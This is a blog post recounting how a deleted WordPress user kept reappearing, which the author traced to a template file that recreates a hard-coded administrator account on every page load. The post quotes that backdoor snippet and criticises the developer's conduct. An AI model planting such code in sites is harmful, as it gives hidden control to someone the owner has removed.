Once upon a time, a long long time ago I used to do some work on people’s websites. It’s how I ended up getting into the entire internet business. I generally don’t do work on people’s sites anymore, though I do manage multiple sites for myself and a few friends and organisations I’m involved with.
I was recently helping somebody make a few tweaks and changes to their site. One of the most straightforward tasks was removing a couple of users that were no longer involved, including a former developer…
Every single time I’d delete the user they’d “magically” reappear.
I tried everything I could think of. Downgrading the user permissions from “admin” to “author” or even to “no role”. It didn’t matter – the user kept being deleted (WordPress would give me a nice confirmation message) but yet the user would still be there.
After going round and round on this a few times I noticed something curious – the user ID kept changing.
So then I checked the database and my suspicion was confirmed. The user create timestamp was the same as the time when I’d last tried to remove them. So the user was being recreated as it was being deleted.
At first I thought it was a plugin – maybe one of the lesser known plugins had this “feature” to “protect” a user? Maybe it was a “hidden” plugin?
Eventually I was able to get assistance via WordPress themselves (the site I was working on was hosted by them). The source of the issue?
Code in one of the template files.
So every single time a page on the site loaded this bit of code would run and if the user in question wasn’t there they’d be recreated.
The code wasn’t particularly complicated, but it was very sneaky:
$userdata = array( 'user_login' => 'dodgyuser', 'user_pass' => 'dodgypassword' , // When creating an user, `user_pass` is expected. 'user_email' => 'firstname.lastname@example.org', 'role' => 'administrator' ); $user_id = wp_insert_user( $userdata ) ;
The key bit in theres is the “wp_insert_user” call. WordPress has a couple of different ways of handling user creation and that’s one of them.
So what was the developer up to?
I’d love to be “generous” and think that they weren’t doing anything nefarious, but the more I think about it the less comfortable I am with it. The code is a backdoor to the site. If there’s a falling out between the site owner and the developer there’s no simple way for a non-technical user to remove the developer from the site once and for all. I’m relatively technical, even if I deny it, and this little backdoor trick had me stumped. If I’d downloaded the entire site and run “grep” on the code to search for every instance of that call to create the user I would probably have found it. Eventually.
Either way this is not a nice or good way to do business with people.
If you outsource website development work to 3rd parties you need to be able to trust them and this kind of behaviour is very disturbing.